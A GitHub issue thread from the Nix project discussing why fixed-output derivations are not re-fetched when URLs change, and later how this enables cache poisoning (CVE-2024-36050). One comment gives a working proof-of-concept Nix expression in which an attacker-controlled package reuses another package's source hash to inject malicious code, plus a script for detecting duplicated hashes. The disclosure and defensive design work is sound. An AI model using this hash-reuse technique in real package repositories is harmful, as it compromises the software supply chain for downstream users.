
re-fetch source when url changes #969

Open
magnetophon opened this issue Jul 13, 2016 · 22 comments

@magnetophon
Member

Currently the source is only re-fetched when the hash changes.
When you use nix-env -i to find the new hash, but forget to actually change the hash, you are stuck with the wrong source.

To add insult to injury: the source is then not re-fetched even when you do change the hash; you first have to garbage-collect the old source.
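
A minimal sketch of the trap, assuming a typical version bump (the URL is a placeholder, and the sha256 deliberately reuses the old tarball's hash; both values are illustrative only):

{ pkgs ? import <nixpkgs> {} }:
pkgs.fetchurl {
  # URL bumped to the new release...
  url = "http://example.com/test-2.0.tar.gz";
  # ...but the sha256 still describes the old tarball. Because the
  # fixed-output hash is unchanged, Nix does not re-fetch, and you end up
  # with the old source under the new name (the behaviour described above).
  sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53";
}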

@domenkozar
Member

In fixed-output derivations, the output is content-addressed by its hash. We could make the URL part of the hash, but then a mirror/URL change would trigger a rebuild, which is very unfortunate.

I propose you change your workflow for updating sources, but I realize that's poor UX.

@copumpkin
Member

I want to better understand the "stuck with the wrong source" thing you mention because I haven't experienced it, but otherwise I'm basically with @domenkozar on this. I don't like the usability aspects either, but I don't know how to retain the nice content-centric properties without something like this.

One option, possibly more work than someone's willing to put into solving this, is for Nix to maintain a local cache of fixed-output derivation output hashes and the regular-derivation-style input hash that led to that output hash. This could be stored as a very simple "output-hash -> regular-derivation-hash" KV mapping. Then it could simply warn you that it's seeing the same output hash coming from a different derivation, which isn't necessarily an error but might be interesting to the user.
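
As a rough illustration only (a hypothetical sketch written as a Nix attribute set; the hash and derivation-hash values are placeholders borrowed from the nix-repl session later in this thread):

# Hypothetical shape of the proposed KV mapping (not a real Nix feature):
# fixed output hash -> regular-derivation-style hash that produced it.
{
  "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53" =
    "9hj80g8r12q74wk6k0wq8zfi1bf6glgn";
}

A lookup that finds an existing output hash arriving from a different derivation hash would then trigger the warning described above.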

@magnetophon
Member Author

@domenkozar: Could you expand on "I propose you change your workflow for updating sources, but I realize that's poor UX"?

@copumpkin: What I mean is: Nix will write the old source to the store, under the new name.

It won't re-fetch it if you just change the hash; you have to remove the "old source under the new name" first.

To the both of you: it seems this issue is not as easy to fix as I hoped.
Feel free to close it if you want.

@copumpkin
Member

What I mean is: Nix will write the old source to the store, under the new name.
It won't re-fetch it if you just change the hash; you have to remove the "old source under the new name" first.

I'm confused. The way Nix thinks about fixed-output derivations is as follows:

  1. The content + the derivation name (which in some cases isn't provided by the user) are the only things that identify the data in the store.
  2. The other stuff like the URL for fetchurl or the git repo specs for fetchgit, and basically all the scripts that call git or curl or whatever are "hints" for how to produce the content in (1). If the content already exists, the scripts won't be run. If the content doesn't exist, and the script produces data with a different hash, Nix will complain that the hash doesn't match and quit.

So here are the scenarios I can think of:

  1. Content not in store, and you change the hash without changing e.g., the url for fetchurl: Nix will fetch the original URL, check it against the new hash you changed, and complain that the hashes don't match.
  2. Content not in store, and you leave the original hash alone: Nix will fetch the original URL, check against the correct hash, and add the result to the store because they match.
  3. Content in store, and you change the hash without changing the URL: Nix will fetch the original URL, check it against the new hash, and complain that the hashes don't match.
  4. Content in store, and you change the hash and change the URL: Nix will fetch the new URL, check it against the new hash, and accept the new content.
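
For instance, scenario (3) can be tried directly with something like this sketch (the example.com URL is a placeholder, and the all-zero sha256 is deliberately wrong):

{ pkgs ? import <nixpkgs> {} }:
pkgs.fetchurl {
  url = "http://example.com/test.tar.gz";
  # Deliberately wrong hash: Nix fetches the URL, compares, and aborts
  # with a hash-mismatch error instead of adding anything new to the store.
  sha256 = "0000000000000000000000000000000000000000000000000000";
}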

It sounds like you're saying (3) is leaving junk in the store that's identified with the new hash but contains the old data, but that doesn't fit with my understanding of how things work. What am I missing?

@magnetophon
Member Author

@copumpkin: I'm talking about the case where you change the version (or the name in general) of the pkg and the url, but not the hash.
AFAIK, in that case it doesn't matter whether the content is already in the store; it'll be stored under the new name.

Sorry for the confusion, hope I'm clear now.

@veprbl
Member

veprbl commented Jul 17, 2016

I see the opposite in my tests:

Welcome to Nix version 1.11.2. Type :? for help.

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.fetchurl { url = "http://example.com/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }
«derivation /blah/nix/store/9hj80g8r12q74wk6k0wq8zfi1bf6glgn-test.tar.gz.drv»

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.fetchurl { url = "http://example.org/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }
«derivation /blah/nix/store/6zh44fbv7agc7n7il0wprzg6hv1khwha-test.tar.gz.drv»

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.stdenv.mkDerivation { name = "test"; src = pkgs.fetchurl { url = "http://example.com/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }; }
«derivation /blah/nix/store/zbajq1zcsz90z8dnnfxfi5d1a36kk17l-test.drv»

nix-repl> let  pkgs = import <nixpkgs> {}; in pkgs.stdenv.mkDerivation { name = "test"; src = pkgs.fetchurl { url = "http://example.org/test.tar.gz"; sha256 = "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53"; }; }
«derivation /blah/nix/store/dvhk6cw4am7r9rgyjb1q7rwqdww6cns7-test.drv»

I would think that Nix shouldn't care about a URL change as long as the hash stays the same. But in reality, changing the URL gives me both a re-download and a (massive) rebuild.

@domenkozar
Member

@veprbl we're talking about the realized derivation hash, not the derivation hash itself.

@freeman42x

@magnetophon

I was getting:

nix-store --delete /nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16
error: cannot delete path ‘/nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16’ since it is still alive

Then I ran:

nix-store -q --roots /nix/store/sfzwi15fsd9wf7qv2rvxwpwr8wk9nkka-AntTweakBar-1.16

and deleted the result links reported by that command.

After that, nix-build picked up the changed URL.

@stale

stale bot commented Feb 15, 2021

I marked this as stale due to inactivity. → More info

stale bot added the stale label Feb 15, 2021
@fricklerhandwerk added the UX and cli labels and removed the cli label Sep 12, 2022
@hab25

hab25 commented Dec 22, 2023

I marked this as stale due to inactivity. → More info

To remove the stale label, just leave a new comment.

stale bot removed the stale label Dec 22, 2023
@tobiasBora

tobiasBora commented Feb 12, 2024

I was thinking: would it make sense to add an option like --force-redownload that would try to re-download the source of the currently built package and double-check that the hash matches? It could help people quickly check whether the hash in a derivation is correct. (EDIT: actually, I think the current behavior brings some security issues; let me test it first.)

@lolbinarycat

One option, possibly more work than someone's willing to put into solving this, is for Nix to maintain a local cache of fixed-output derivation output hashes and the regular-derivation-style input hash that led to that output hash.

Doesn't Nix already track this for garbage collection purposes? nix-store -q --deriver and nix-store -q --valid-derivers should give you enough information to triangulate this.

@tobiasBora

tobiasBora commented Apr 29, 2024

I can confirm that this bug can lead to some security issues, described in an email sent to the security team (I'll likely create a public issue soonish). Other potential attacks (if other functionality like cache sharing between Ofborg and reviewers/Hydra is implemented) are described in NixOS/ofborg#68 (comment).

What I propose to solve this is to keep, on each Nix installation, a map URL -> hash (or rather, as suggested by Linus in a private email, a map derivation -> hash, since fixed-output derivations may be much more general than downloading a file). For any fixed-output derivation whose hash is already present on the system, Nix should first check whether the url/derivation is also contained in the database with the appropriate hash. If not, it should re-execute the derivation, check that the hash is correct, and if so continue from the cached value.
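
As a rough illustration (a hypothetical shape only, reusing the derivation path and hash from the nix-repl session earlier in this thread):

# Hypothetical shape of the proposed trusted map: fixed-output drvPath ->
# the output hash that was verified for it. A FOD whose drvPath is absent,
# or maps to a different hash, would be re-executed and checked.
{
  "/nix/store/9hj80g8r12q74wk6k0wq8zfi1bf6glgn-test.tar.gz.drv" =
    "0biw882fp1lmgs6kpxznp1v6758r7dg9x8iv5a06k0b82bcdsc53";
}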

EDIT: See my proposal in NixOS/ofborg#68 (comment) for a more robust version.

@oxij
Member

oxij commented May 6, 2024 via email

@tobiasBora

tobiasBora commented May 6, 2024

Yes, I actually realized this exact issue with fetchzip this morning and transmitted an MWE to the security team showing that one can use the code of any package controlled by an adversary to inject code into any other package, exploiting the fact that fetchzip removes the package name & version from the source derivation's name, which makes the attack trivial to carry out: the difference between a malicious & an honest derivation is just one hash.

As a result, I submitted a CVE online.

Patching fetchzip as discussed in NixOS/rfcs#171 is only a first step and does not stop the slightly more involved cache-poisoning attacks. The only robust fix I can think of is what I am proposing in NixOS/ofborg#68 (comment).

Merging NixOS/nixpkgs#49862, setting nameSourcesPrettily = true or nameSourcesPrettily = "full" by default, and banning custom-named source derivations is a workaround that will work in the meantime.

That might be a first quick mitigation (actually not needed if we implement NixOS/ofborg#68 (comment)), but it is not sufficient. Nobody would notice a misnamed derivation, for instance in a long automatically generated file.

@oxij
Member

oxij commented May 6, 2024 via email

@tobiasBora

tobiasBora commented May 7, 2024

I have to admit I don't yet fully grasp your whole proposal, but here are a few comments after a first reading:

While your algorithm will work if you trust Hydra to do the right thing and check all fixed-output outputs, the problem is that ATM Hydra won't do it because Nix does not do it.

Well, I precisely want Nix to implement it. All other solutions would either not work or require the user to do massive downloads (if the data doesn't exist, you have no other way than regenerating it yourself) to check all FODs, which can lead to many issues. Not only would the user need to download the (transitive) sources of all packages they want to install, even if they only care about the final binary, but if a source is no longer available at its current location, the user would not even be able to install the binary (and the security team mentioned to me that they don't want to go down this path, as it used to work this way and created many issues).

I.e. you are trying to prevent poisoning of your local /nix/store with an unrelated output substituted from a binary cache, but, as I pointed out above, the attacker can trivially poison your (and Hydra's) /nix/store directly too by reusing old hashes.

If one changes Nix the way I propose, I don't see how anyone could poison Hydra's cache (assuming we trust Hydra itself… but one already needs to trust Hydra for many other reasons anyway). The new derivation -> hash map is precisely used to say "Hydra checked that this FOD derivation evaluates to this hash", i.e. "no poisoning has been done on this derivation". In particular, old hashes would NOT be part of this trusted map until Hydra checks that they are indeed correct.

setting nameSourcesPrettily = true or nameSourcesPrettily = "full" by default is one work-around for this.

I don't see it as a true work-around. It makes one very particular attack (downgrading) harder, but there are many other ways to pollute a cache, for instance by adding (e.g. a few months in advance, to be sure it is in Hydra's cache) a malicious dependency in some automatically generated file bearing the name & version of the program to attack.

Nix should remember a mapping of outPath -> set<drvPath> for each valid outPath in /nix/store

I think this is more or less what I proposed, just with the map the other way around, as I was proposing drvPath -> outPath instead; I also propose to let cache.nixos.org/… share this map.

One possible way to minimize rebuilds […]

What do you call a rebuild here? Do you mean that:

  • the FOD output should be re-checked by Hydra, to complete the map drvPath -> outPath (which indeed should be done by Hydra if the fetch* functions change, and I guess having a lite version of mkDerivation makes sense if these change often)
  • the FOD output should be re-checked by the end user: this should NOT be the case, at least if Hydra already did it before and if we implement the sharing of drvPath -> outPath that I was proposing above
  • the whole world should be rebuilt: this should NOT be the case; once the user is assured that the hash is correct, they can use the old derivation as before.

@oxij
Member

oxij commented May 7, 2024 via email

@tobiasBora

tobiasBora commented May 10, 2024

What reasons?

Anyone relying on cache.nixos.org (which is likely 99% of users) needs to trust Hydra, since it can always inject malicious code into the final binary… just like Debian users need to trust Debian maintainers. And I don't see how checking the hash can help here: programs are not FODs and their hashes may vary across builds in general, so until we have succinct verifiable proofs of honest compilation (which, let's be honest, is never going to happen) or at least 100% reproducible builds, we need to trust Hydra.

Anyway, the attack I describe would also apply to people NOT using Hydra, so building everything from source will not help, since the build will pick up the wrong source.

If the attacker manages to guess a version number (or the prefix of the revision) with a CVE they could attack in advance. So... almost never.

I think you misunderstand the attack I have in mind. What I describe allows any adversary to inject arbitrarily malicious code (irrespective of whether the actual program will have a CVE or not) into a future release of any program, assuming they can simply guess the name of the release… which is trivial (version numbers usually increase one by one, and releases are often pre-published in an alpha form like 3.42-alpha).

But now, remembering the uncountable number of times I had to fix fixed-output hashes locally

Is that really the experience we want for Nix end users?

Was something poisoned already?

Hard to say. I tried to do a quick check in Nixpkgs by looking at duplicated hashes (though a different attack could be applied so that this would not show up so clearly). The number of duplicated hashes is quite large, so I used a script to help me discard the innocent-looking ones; most of them seem quite honest. Only two physics programs (in pkgs/by-name) were sharing the same hash while having very different names… but I had no time to investigate further.

which would mean frequent mass rebuilds

I don't see why we would get more rebuilds than now. If a program is in the cache, Hydra already downloaded its source, so the user can rely on Hydra's map. If Hydra has not built the package yet, the user needs to build everything anyway. And if the package is a "legacy package", in the sense that it was built by Hydra before this option was introduced, what I propose (maybe what you propose as well; I'm not sure I understand all the details) allows the user to only download & check the source while using the binary compiled by Hydra (which saves most of the time-consuming part).

Precise formats of outputPathToken for different fetch*ers and their security implications could and should be discussed.

I'm not sure I understand all the details of your proposal here (maybe because I lack some knowledge of Nix's internals), but I think I get the big picture. Creating equivalence classes of derivations (which could be a nice concept in Nix in general) could be a nice way to limit rebuilds in case of curl updates… but your implementation with outputPathToken raises a number of questions, including in terms of security:

  • how can we enforce that a FOD cannot change its own outputPathToken? If any derivation & fetcher can set this option (as is the case now, as I understand it), this provides basically no additional security, since the attacker could always submit an obfuscated FOD that sets outputPathToken to the one used by fetchgit/… So for this to work, outputPathToken must be added by a new mechanism in Nix, and not via the usual derivation.
  • outputPathToken should be a hint coming from the fetcher, but Nix should provide command-line options to follow or ignore these recommendations (in a more or less paranoid way)
  • if my understanding is correct, outputPathToken alone is not sufficient, as it does not assert that the hash is correct. Notably, if I try to execute a derivation and realize that the provided hash is not correct, one MUST REMOVE this derivation's output from /nix/store, otherwise we have no way of knowing whether a derivation really evaluates to a given hash.

So based on the first point, since it seems hard to only allow specific fetchers to create a given outputPathToken (unless you know some special tricks?), and since a new Nix concept must be introduced anyway, we could maybe deal with this by creating a new kind of derivation that specifies what must be downloaded rather than how to obtain it, as is the case now. For instance, one could create a derivation like:

Derive({
  "kind": "fetchurl",
  "url": "myurl",
  "out": "/nix/store/foo.tar.xz",
  "sha256": "somehash"
})

and Nix should automatically understand that when receiving this derivation, it should download the URL, using any curl version it wants, as long as the hash matches at the end. If we don't want to hardcode all the fetchers in Nix itself (let's try to keep Nix small), we can let Nix take as input a special Nix file, trusted-fetchers.nix, containing all the "trusted fetchers". This could be a map like kind -> fetcher, such that when Nix encounters a custom derivation it is not able to execute, it would resort to using the fetcher in the map instead. This means that we only need to audit trusted-fetchers.nix instead of Nixpkgs in its totality.

More specifically, fetcher could be a function taking the above derivation as input and outputting an Ok/Not-ok bit (and possibly an error message) together with a folder, such that the folder is kept as out by Nix iff the bit is true (intuitively, the bit says "I checked that the hash is correct").

This idea of equivalence between fetchers could certainly also be used to solve other issues with non-deterministic processes. For instance, we currently have no solution to avoid hash shifts with leaveDotGit = true; (NixOS/nixpkgs#8567) and certainly many other package-manager quirks. One option here would be to create a derivation:

Derive({
  "kind": "fetchgit",
  "url": "git repo",
  "leaveDotGit": true,
  "out": "/nix/store/foo.tar.xz",
  "sha256": "somehash"
})

where the hash only corresponds to the "stable" part of the package, i.e. what is outside .git. The fetcher would then run git clone to clone the repository, compute the hash of the stable part, and output "OK" if that hash matches.
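
A minimal sketch of what such a fetchgit entry could look like in the hypothetical trusted-fetchers.nix discussed above (the args field and the $tmpOut/$tmpOutSha variables are placeholder conventions for whatever interface Nix would actually provide, and the exact hashing scheme is an assumption):

{pkgs, ...}: {
  "fetchgit" = {
    args = [ "url" "leaveDotGit" ];
    script = ''
      ${pkgs.git}/bin/git clone "$url" "$tmpOut"
      # Hash only the stable part of the checkout, i.e. everything outside
      # .git. A real implementation would also pin tar metadata (mtime,
      # owner, ...) so the archive bytes are fully deterministic.
      (cd "$tmpOut" && ${pkgs.gnutar}/bin/tar --sort=name --exclude=.git -cf - . \
        | ${pkgs.coreutils}/bin/sha256sum) > "$tmpOutSha"
    '';
  };
}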

But if the user does not use Hydra, and curl changed, and the user is feeling sufficiently paranoid, I would think having a way to re-check everything would be a good thing.

Well, re-checking the source: I agree that's nice to have… but there is no need to recompile programs.

@oxij
Member

oxij commented May 15, 2024 via email

@nixos-discourse

This issue has been mentioned on NixOS Discourse. There might be relevant details there:

https://discourse.nixos.org/t/nixpkgs-supply-chain-security-project/34345/19

@tobiasBora

tobiasBora commented May 21, 2024

I'm not sure why my last answer was not posted. In the meantime, the CVE got published at https://nvd.nist.gov/vuln/detail/CVE-2024-36050

Package derivations (<name>) should not be rebuilt, of course.

Good, I just wanted to be sure we are on the same page.

So the solution can not be "check derivers on Hydra and/or other configured binary caches", it has to be a general thing.

Definitely agree. My point was just to reduce the amount of downloaded material from the user's perspective by using the cache when available; otherwise users (especially those with little bandwidth) would suffer a lot, and if the source location changed they would get a 404 error even when it is still cached.

I'm referencing the exploit described in #969 (comment) there.

I show a much more generic attack at https://github.com/leo-colisson/CVE_NixOs_cache_spoil/, with some variants using fetchurl instead of fetchzip, etc. For instance, this:

{ pkgs ? import <nixpkgs> {} }:
pkgs.callPackage ({stdenv, fetchzip}:
  let iconpackage = stdenv.mkDerivation rec {
        pname = "iconpackage";
        version = "42.0";
        src = fetchzip {
          url = "http://localhost:8042/iconpackage-${version}.tar.gz"; # <-- this is controlled by the adversary
          sha256 = "sha256-kACAk1+Se9vaJN8FkqLRJsOI7szD9zw015nCxxT54bs=";
        };
        buildPhase = ":";
        installPhase = ''
          mkdir -p $out/share/icons/hicolor/64x64/apps/
          mv myicon.png $out/share/icons/hicolor/64x64/apps/
        '';     
      };
      honestpackage = stdenv.mkDerivation rec {
        pname = "honestpackage";
        version = "1.0";
        src = fetchzip {
          url = "http://localhost:8042/honestpackage-${version}.tar.gz"; # <-- this is NOT controlled by the adversary
          sha256 = "sha256-kACAk1+Se9vaJN8FkqLRJsOI7szD9zw015nCxxT54bs=";
        };
        buildInputs = [ iconpackage ];
        buildPhase = ":";
        installPhase = ''
          mkdir -p $out/bin
          mv honestpackage.sh $out/bin
        '';
      };
  in honestpackage
) {}

would result in:

$ nix-build
$ ./result/bin/honestpackage
I am malicious >:-|

In the context I discuss there, say curl changes, now all <name>.src derivations that use fetchurl have to be rebuilt.

Yeah, I see now; hence my proposal to have trusted fetchers.

Specifically, yes, outputPathTokens is probably not a good solution when the attacker can also modify the fetch* derivations themselves

Well, they can always do that, for instance by implementing their own FOD derivation, without even relying on a pre-existing fetch* at all.

Making full-featured curl into a Nix builtin is a possibility (as opposed to fetchurlBoot that exists now), but what about derivations fetched with curl and then unpacked with zip […] Is it possible to do? Yes. Is it a desirable solution? Probably not.

That's precisely why I don't want to include this in Nix directly, but rather provide Nix with a trusted-fetchers.nix file via a command line like nix --trusted-fetchers trusted-fetchers.nix, or simply have Nix pick this file up automatically by default. One needs to think carefully about this file, but after a quick thought, it could look like:

{pkgs, ...}: {
  "fetchurl" = {
    args = [ "url" ];
    script = ''
      # Download to $tmpOut and record its hash for Nix to compare.
      ${pkgs.curl}/bin/curl "$url" -o "$tmpOut"
      ${pkgs.coreutils}/bin/sha256sum "$tmpOut" > "$tmpOutSha"
    '';
  };
}

This way, when a user calls fetchurl { url = "https://foo.com"; hash = "somehash"; }, it would create a derivation like:

Derivation({
  "trustedFetcher": "fetchurl",
  "url": "https://foo.com",
  "hash": "somehash"
})

(note that it is agnostic of curl's version), and to execute it, Nix would pick the appropriate fetcher in trusted-fetchers.nix (unless the result is already present in the cache), run the corresponding script, and at the end compare the content of $tmpOutSha with the hash in the derivation. If they match, it then derives the final $out from the hash of the derivation and copies $tmpOut to this path.

How are you doing this, exactly? Are you parsing Nix files by hand?

Right now this is done in a very dirty way, via a simple grep (requires ripgrep):

import os
import re

# Find hashes that appear more than once in the current checkout
# (run from the root of a nixpkgs clone; requires ripgrep).
for line in os.popen("rg -o 'hash = \".*\"' --no-filename | sort | uniq -c | sort -hr | rg -v \"1 hash\" | rg -o '\".*\"'").readlines():
    print(f"==={line}")
    # Show some context around each occurrence of the duplicated hash.
    output = os.popen(f"rg -F '{line.strip()}' -C 5").read()
    # If the same owner or url appears twice, the duplication is probably
    # legitimate (the same source fetched in two places).
    res = re.findall(r'owner ?= ?"[^"]*"', output)
    if res and len(res) - len(set(res)) > 0:
        print("The owner appears twice, sounds good enough here")
        continue
    res = re.findall(r'url ?= ?"[^"]*"', output)
    if res and len(res) - len(set(res)) > 0:
        print("The url appears twice, sounds good enough here")
        continue
    print(output)
    print("===================================================================\n\n\n")

You can see that the number of duplicated hashes is quite large (155), so I try to discard some of them automatically, for instance when I see the same url twice around the matching lines, but this is very dirty, and I don't consider it any kind of proper security measure. Even with this filtering there are quite a lot of entries to read manually, so it would be better to actually extract all such fetch* calls and try to run them (without using the local cache, of course; I'm not sure how to do that) to see whether the hash is actually correct…
